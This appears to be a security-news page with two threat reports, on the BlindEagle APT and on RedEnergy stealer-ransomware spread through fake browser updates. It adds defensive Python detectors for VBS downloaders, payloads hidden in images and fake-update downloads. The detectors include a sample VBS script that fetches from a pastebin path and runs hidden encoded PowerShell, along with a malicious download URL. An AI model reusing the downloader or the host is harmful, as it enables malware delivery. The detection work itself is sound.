Joint integration delivers effective DSPM enforcement for self-managed customers starting with credential-free access, risk-based continuous authentication, and protection from data exposure.
Related Posts
CISA: Hackers abuse F5 BIG-IP cookies to map internal servers
CISA is warning that threat actors have been observed abusing unencrypted persistent F5 BIG-IP cookies to identify and target other internal devices on the targeted network.
New APT Group BlindEagle Attacking Multiple Organizations Via Weaponized Emails
BlindEagle (APT-C-36) is a Latin American Advanced Persistent Threat group that has been active since 2018. It targets the governmental, financial, and energy sectors in Colombia, Ecuador, Chile, Panama, and other regional countries.
BlindEagle is known for employing straightforward yet impactful techniques, and it switches readily between financially motivated attacks and espionage operations.
Cybersecurity researchers at Kaspersky Lab recently published an analysis of the group's campaigns, which attack multiple organizations via weaponized emails.
APT Group BlindEagle Attacking Organizations
BlindEagle carries out multi-stage attacks that start with phishing emails impersonating government and financial institutions.
To avoid detection and analysis, the campaigns apply geolocation-based filtering through URL shorteners, so that only visitors from the targeted regions reach the malicious content.
Typically, the initial infection vector is a compressed file, sometimes in a less common format such as LHA or UUE, that contains a Visual Basic Script.
These scripts use WScript, XMLHTTP objects, or PowerShell to download further payloads from attacker-controlled servers or from public platforms such as Pastebin or GitHub.
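The first stage described above (an uncommon archive format wrapping a VBS that pulls the next payload from Pastebin or GitHub via XMLHTTP, WScript.Shell or PowerShell) is easy to triage with a small scoring heuristic. The following is an added example, not code from Kaspersky or from the article: it scores extracted script members against a table of download-and-execute indicators and adds weight for rare archive formats. The indicator weights, the thresholds, and the two sample scripts are constructed for illustration.

```python
import os
import re
from typing import Dict, List, Tuple

# Archive extensions the article associates with BlindEagle lures. LHA/UUE are
# rare in business mail, so their presence alone earns a higher weight.
UNCOMMON_ARCHIVE_EXTS = {".lha", ".lzh", ".uue", ".uu"}
COMMON_ARCHIVE_EXTS = {".zip", ".rar", ".7z", ".gz", ".cab"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")

# Download-and-execute primitives typical of a VBS first stage: (name, regex, weight).
# The weights are illustrative tuning values, not taken from the report.
VBS_INDICATORS: List[Tuple[str, "re.Pattern", int]] = [
    ("xmlhttp_object",
     re.compile(r'createobject\s*\(\s*"(msxml2\.(server)?xmlhttp|microsoft\.xmlhttp)', re.I), 3),
    ("wscript_shell", re.compile(r'createobject\s*\(\s*"wscript\.shell"', re.I), 2),
    ("adodb_stream", re.compile(r'createobject\s*\(\s*"adodb\.stream"', re.I), 2),
    ("powershell_launch",
     re.compile(r"powershell(\.exe)?\b[^\n]*?(-enc|-e\b|-nop|-w\s*hidden|iex|downloadstring)", re.I), 3),
    ("paste_or_repo_host",
     re.compile(r"https?://(pastebin\.com|raw\.githubusercontent\.com|github\.com)/", re.I), 2),
    ("url_shortener", re.compile(r"https?://(bit\.ly|tinyurl\.com|cutt\.ly|is\.gd)/", re.I), 2),
    ("chr_concatenation", re.compile(r"chr\s*\(\s*\d+\s*\)\s*&\s*chr\s*\(", re.I), 1),
]


def score_script(text: str) -> Tuple[List[str], int]:
    """Return the indicator names that fire on one script body and their summed weight."""
    hits = [name for name, rx, _w in VBS_INDICATORS if rx.search(text)]
    score = sum(w for name, _rx, w in VBS_INDICATORS if name in hits)
    return hits, score


def archive_signal(archive_name: str) -> int:
    """Weight for the container format alone (LHA/UUE are rarer than ZIP/RAR)."""
    ext = os.path.splitext(archive_name.lower())[1]
    if ext in UNCOMMON_ARCHIVE_EXTS:
        return 2
    if ext in COMMON_ARCHIVE_EXTS:
        return 1
    return 0


def triage_archive(archive_name: str, members: Dict[str, str]) -> Dict[str, object]:
    """members maps each extracted member name to its decoded text content."""
    score = archive_signal(archive_name)
    hits: List[str] = []
    for member, text in members.items():
        if member.lower().endswith(SCRIPT_EXTS):
            hits.append(f"script_member:{member}")
            score += 1                      # any script inside an archive is worth a look
            member_hits, member_score = score_script(text)
            hits.extend(member_hits)
            score += member_score
    # Thresholds are illustrative; tune them against your own mail flow.
    verdict = "block" if score >= 6 else "review" if score >= 3 else "allow"
    return {"archive": archive_name, "score": score, "hits": hits, "verdict": verdict}


# Constructed sample: a minimal BlindEagle-style downloader (not a real sample).
SAMPLE_DOWNLOADER = '''
Dim http, sh
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "https://pastebin.com/raw/EXAMPLE", False
http.Send
Set sh = CreateObject("WScript.Shell")
sh.Run "powershell -nop -w hidden -enc " & http.responseText, 0, False
'''

# Constructed sample: an admin helper script that should not trip the heuristic.
SAMPLE_BENIGN = '''
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FolderExists("C:\\Logs") Then WScript.Echo "ok"
'''

if __name__ == "__main__":
    print(triage_archive("demanda_juzgado.lha", {"demanda.vbs": SAMPLE_DOWNLOADER}))
    print(triage_archive("report.zip", {"helper.vbs": SAMPLE_BENIGN}))
```

The regexes match only the primitives, not any particular payload, so the check survives variable renaming and string reshuffling; what it does not survive is heavy Chr() concatenation of the object names, which is why that pattern carries its own (small) weight.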
The deployment then advances through several stages of encoded or obfuscated artifacts, often using steganography to hide payloads inside images, and culminates in modified open-source Remote Access Trojans (RATs).
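One quick check for the image-carried payloads mentioned above is to ask whether anything follows the structural end of the image file, since a common way to smuggle a PE or .NET assembly in a picture is to append it (raw or base64-encoded) after the PNG IEND chunk or the JPEG EOI marker. The example below is added here and is not Kaspersky's or the article's code; the minimal PNG carrier and the fake MZ stub it inspects are constructed for the test, and the specific embedding method BlindEagle uses in a given campaign may differ from this simple trailer form.

```python
import base64
import re
import struct
import zlib
from typing import Dict, List, Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
MZ = b"MZ"
# A long run of base64 alphabet characters: PE payloads carried in images are
# commonly stored this way so the loader can decode them with a one-liner.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def image_end_offset(data: bytes) -> Optional[int]:
    """Offset just past the structural end of a PNG (IEND chunk) or JPEG (EOI marker)."""
    if data.startswith(PNG_SIG):
        pos = len(PNG_SIG)
        while pos + 8 <= len(data):
            length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
            pos += 8 + length + 4          # chunk header + data + CRC
            if ctype == b"IEND":
                return pos
        return None                        # truncated or malformed PNG
    if data.startswith(JPEG_SOI):
        # First EOI after the header. Caveat: an EXIF thumbnail also ends with
        # FFD9, so a more careful scanner walks the marker segments instead.
        eoi = data.find(JPEG_EOI, len(JPEG_SOI))
        return None if eoi == -1 else eoi + len(JPEG_EOI)
    return None


def inspect_image(data: bytes) -> Dict[str, object]:
    """Report bytes appended after the image and whether they look like a PE payload."""
    end = image_end_offset(data)
    if end is None:
        return {"format": "unknown", "trailer_len": 0, "findings": ["unparseable"]}
    fmt = "png" if data.startswith(PNG_SIG) else "jpeg"
    trailer = data[end:]
    findings: List[str] = []
    if trailer.startswith(MZ):
        findings.append("raw_pe_after_image")
    for m in B64_RUN.finditer(trailer):
        try:
            blob = base64.b64decode(m.group(0), validate=True)
        except ValueError:
            continue                        # not a clean base64 run
        if blob.startswith(MZ):
            findings.append("base64_pe_after_image")
            break
    if trailer and not findings:
        findings.append("unexplained_trailer")
    return {"format": fmt, "trailer_len": len(trailer), "findings": findings}


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def minimal_png() -> bytes:
    """Constructed 1x1 8-bit grayscale PNG used as the clean carrier."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")      # filter byte + one pixel
    return PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"")


# Constructed stand-in for a .NET assembly: a DOS header stub, not a real executable.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 61


def sample_stego_image() -> bytes:
    """Clean carrier with the base64-encoded stub appended after IEND."""
    return minimal_png() + base64.b64encode(FAKE_PE)


if __name__ == "__main__":
    print(inspect_image(minimal_png()))
    print(inspect_image(sample_stego_image()))
```

Run this over image attachments and downloaded pictures as a cheap pre-filter; anything with a non-empty trailer deserves a closer look even when no MZ header is visible, because the loader may strip or transform the bytes before decoding.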
The group rotates between RATs such as njRAT, LimeRAT, BitRAT, and AsyncRAT, picking whichever suits a given campaign's goal, whether online financial theft or cyber espionage.
They use process injection, mainly process hollowing, to evade detection: the final payload is executed inside the memory space of a legitimate process.
The team modifies their RATs with improved information collection abilities, additional plugin installation features, and, in some cases, a special capability for intercepting bank account credentials, showing how they tailor them to the victims' characteristics or to what each campaign intends to achieve, reads the report.
BlindEagle was previously recognized as using simple tactics such as basic phishing and off-the-shelf malware. But more recently, the group has demonstrated more complex methods against its targets.
In May 2023, they conducted a campaign whose artifacts carried Portuguese language characteristics and used Brazilian image-hosting sites, possibly indicating cooperation with other groups.
The following month, June, saw an attack that used DLL sideloading and deployed HijackLoader, a new modular malware loader.
TTPs
Here below we have mentioned all the TTPs:-
Phishing
Malicious Attachments
URL Shorteners
Dynamic DNS
Public Infrastructure
Process Hollowing
VBS Scripts/.NET Assemblies
Open-source RATs
These attacks start with phishing emails purporting to be from Colombian judicial institutions, carrying malicious PDF or DOCX attachments that look legitimate but trick victims into downloading and running the next-stage files.
Colombia remains the group's main target, with 87% of victims located there, but BlindEagle also operates in Ecuador, Chile, and Panama.
Its campaigns affect a range of sectors, including government, education, health, and transport. Through its repeated cyber-espionage and financial credential theft campaigns, BlindEagle continues to represent a serious threat in the region.
The post New APT Group BlindEagle Attacking Multiple Organizations Via Weaponized Emails appeared first on Cyber Security News.
New Stealer-as-a-Ransomware Delivered Through Fake Updates
Recently, the cybersecurity analysts at Zscaler found RedEnergy, a new malware variant that combines an information stealer with ransomware, a hybrid they describe as Stealer-as-a-Ransomware.
RedEnergy reaches its targets through fake browser updates, steals data from browsers, exfiltrates sensitive information, and then runs a ransomware module.
This combination of stealthy data theft and file encryption is designed to cause extensive harm and give the operators complete leverage over their victims.
It targets multiple industries, and here below, we have mentioned them:-
Energy utilities
Oil
Gas
Telecom
Machinery
Using a deceptive FAKEUPDATES campaign, the malware lures targets into promptly "updating" their browser.
Once on the system, it exfiltrates data and encrypts files, leaving victims exposed to data loss as well as to the exposure or sale of the stolen information.
Stealer-as-a-Ransomware Campaign Analysis
Zscaler found RedEnergy targeting a Philippine industrial machinery manufacturer and other companies with prominent LinkedIn pages.
The campaign abuses the website link on such a company page, which visitors expect to lead to the company's own site: the link redirects them to a fake browser update page.
That page shows four browser icons; whichever one the victim clicks, they download the RedStealer executable instead of an update.
Regardless of the browser icon clicked, users are redirected to the following address:-
www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe
This URL serves the first component of the malicious payload, setupbrowser.exe.
The same download domain, www[.]igrejaatos2[.]org, also poses as a "ChatGPT" site offering a fake offline version of ChatGPT.
Victims who take that bait receive the same malicious executable, packaged as a ChatGPT zip file.
Beyond the campaign against the Philippine manufacturer, Zscaler's wider search turned up other FAKEUPDATES campaigns that share the same traits and techniques, suggesting a coordinated cybercriminal effort.
A campaign impersonating a major Brazilian telecom company works the same way: victims land on the same web page and download the same executable from:-
www[.]igrejaatos2[.]org/assets/programs/setupbrowser.exe
Reusing infrastructure and tactics like this is common practice for attackers looking to widen their reach and increase profits at little extra cost.
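The delivery pattern described in this section (a profile page on a social network, a redirect on the lure domain, then an installer-named executable from a host that is not the browser vendor's) leaves a recognisable trail in web proxy logs. The example below is added here and is not Zscaler's code; it parses a constructed proxy log format, correlates each binary download with the same client's preceding requests, and reports why a download looks like a fake-update lure. The log lines, the LinkedIn path, the vendor allowlist and the 120-second window are all constructed or illustrative.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List
from urllib.parse import urlparse


@dataclass
class Req:
    ts: datetime
    client: str
    url: str
    status: int
    referer: str
    ctype: str


def parse_log(text: str) -> List[Req]:
    """Parse the constructed format: ts client method url status referer content-type."""
    reqs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url, status, referer, ctype = line.split()
        reqs.append(Req(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        client, url, int(status), referer, ctype))
    return reqs


# File names a fake-update page would hand out; "chatgpt" covers the second lure.
LURE_NAME = re.compile(
    r"(setup|update|install)[a-z_-]*browser|browser[a-z_-]*(setup|update)"
    r"|\b(chrome|firefox|edge|opera|chatgpt)", re.I)
# Illustrative allowlist of genuine vendor download hosts; extend for your environment.
VENDOR_DOWNLOAD_HOSTS = {"dl.google.com", "download.mozilla.org"}
SOCIAL_HOSTS = {"www.linkedin.com", "linkedin.com", "www.facebook.com", "facebook.com"}
BINARY_TYPES = {"application/x-msdownload", "application/octet-stream", "application/zip"}


def is_binary_download(r: Req) -> bool:
    path = urlparse(r.url).path.lower()
    return path.endswith((".exe", ".msi", ".zip")) or r.ctype in BINARY_TYPES


def find_fake_update_downloads(reqs: List[Req],
                               window: timedelta = timedelta(seconds=120)) -> List[Dict[str, object]]:
    """Flag binary downloads whose surrounding requests match the fake-update delivery chain."""
    by_client: Dict[str, List[Req]] = {}
    for r in sorted(reqs, key=lambda x: x.ts):
        by_client.setdefault(r.client, []).append(r)
    alerts = []
    for client, hist in by_client.items():
        for i, r in enumerate(hist):
            if not is_binary_download(r):
                continue
            parsed = urlparse(r.url)
            host = parsed.hostname or ""
            fname = parsed.path.rsplit("/", 1)[-1]
            recent = [p for p in hist[:i] if r.ts - p.ts <= window]
            reasons = []
            if LURE_NAME.search(fname) and host not in VENDOR_DOWNLOAD_HOSTS:
                reasons.append("installer-like file name served from a non-vendor host")
            if any((urlparse(p.url).hostname or "") in SOCIAL_HOSTS for p in recent):
                reasons.append("preceded by a social-network profile visit")
            if any(300 <= p.status < 400 and (urlparse(p.url).hostname or "") == host for p in recent):
                reasons.append("reached through a redirect on the download host")
            if reasons:
                alerts.append({"client": client, "url": r.url, "reasons": reasons})
    return alerts


# Constructed proxy log: one client follows the lure chain, another fetches a real Chrome installer.
SAMPLE_PROXY_LOG = """\
2023-06-12T10:01:03Z 10.0.4.21 GET https://www.linkedin.com/company/example-machinery/ 200 - text/html
2023-06-12T10:01:09Z 10.0.4.21 GET https://www.igrejaatos2.org/ 302 https://www.linkedin.com/company/example-machinery/ text/html
2023-06-12T10:01:10Z 10.0.4.21 GET https://www.igrejaatos2.org/assets/programs/setupbrowser.exe 200 https://www.igrejaatos2.org/ application/x-msdownload
2023-06-12T10:05:44Z 10.0.4.30 GET https://www.google.com/chrome/ 200 - text/html
2023-06-12T10:05:51Z 10.0.4.30 GET https://dl.google.com/chrome/install/ChromeSetup.exe 200 https://www.google.com/chrome/ application/x-msdownload
"""

if __name__ == "__main__":
    for alert in find_fake_update_downloads(parse_log(SAMPLE_PROXY_LOG)):
        print(alert)
```

The legitimate Chrome download in the sample produces no alert because the vendor-host allowlist absorbs the name match and there is neither a social-network visit nor a redirect in front of it; the value of the rule is in requiring the chain, not any single indicator.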
Malware Infection chain
The RedEnergy malware has dual functionality:-
Stealer
Ransomware
To hinder detection and analysis, the author deliberately obfuscated the .NET binary.
Command-and-control communication goes over HTTPS, so the traffic is both encrypted and harder to inspect.
Attack Chain
The complete infection chain involves three stages:-
Stage 1: Initial Startup
Stage 2: Dropping Files, Persistence, Outgoing Requests, Encrypted Files
Stage 3: Decryption Routine
The final payload drops a ransom note named "read_it.txt" in every folder it encrypts, informing users of the ransom demanded for releasing the files.
Based on the Zscaler analysis, it is clear that industries and organizations are confronted with constantly evolving and highly sophisticated cyber threats.
To mitigate the impact, organizations need strong security measures, user awareness, and prompt incident response.
With constant vigilance and sound cybersecurity strategies, businesses can shield valuable data from such campaigns.
The post New Stealer-as-a-Ransomware Delivered Through Fake Updates appeared first on Cyber Security News.